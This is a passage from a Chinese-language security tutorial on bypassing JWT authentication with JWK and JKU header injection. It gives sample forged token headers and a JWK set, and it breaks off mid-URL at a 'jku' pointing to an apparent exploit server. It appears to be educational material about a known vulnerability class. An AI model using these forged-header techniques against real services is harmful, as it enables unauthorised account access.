4、通过 JWK 标头注入绕过 JWT 身份验证
JSON Web 签名 (JWS) 规范描述了一个可选的标头参数,服务器可以使用该参数以 JWK 格式将其公钥直接嵌入到令牌本身中,再利用嵌入公钥的私钥进行签名,服务端会采用嵌入的公钥进行验证,从而绕过成功。
JWK(JSON Web Key)是一种标准化格式,用于将密钥表示为JSON对象。JWT 标头示例:
{
“kid”: “ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG”,
“typ”: “JWT”,
“alg”: “RS256”,
“jwk”: {
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “ed2Nf8sb-sD6ng0-scs5390g-fFD8sfxG”,
“n”: “yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9m”
}
}
5、通过 JKU 标头注入绕过 JWT 身份验证
某些服务器允许您使用 (JWK Set URL) 标头参数引用包含密钥的 JWK 集,而不是直接使用 header参数嵌入公钥。验证签名时,服务器从此 URL 获取相关密钥,通过利用URL公钥的私钥进行签名,服务端会采用URL 获取相关密钥验证,从而绕过成功。
JWK 集是一个 JSON 对象,其中包含表示不同键的 JWK 数组。示例。
{
“keys”: [
{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “75d0ef47-af89-47a9-9061-7c02a610d5ab”,
“n”: “o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ”
},
{
“kty”: “RSA”,
“e”: “AQAB”,
“kid”: “d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA”,
“n”: “fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw”
}
]
}
将JKU加入到JKT中,kid需要改成生成公钥的kid:
{
“kid”: “d3adb574-f8e4-43c0-ab43-2839670aa123”,
“alg”: “RS256”,
“jku”: “https://exploit-0a4700ee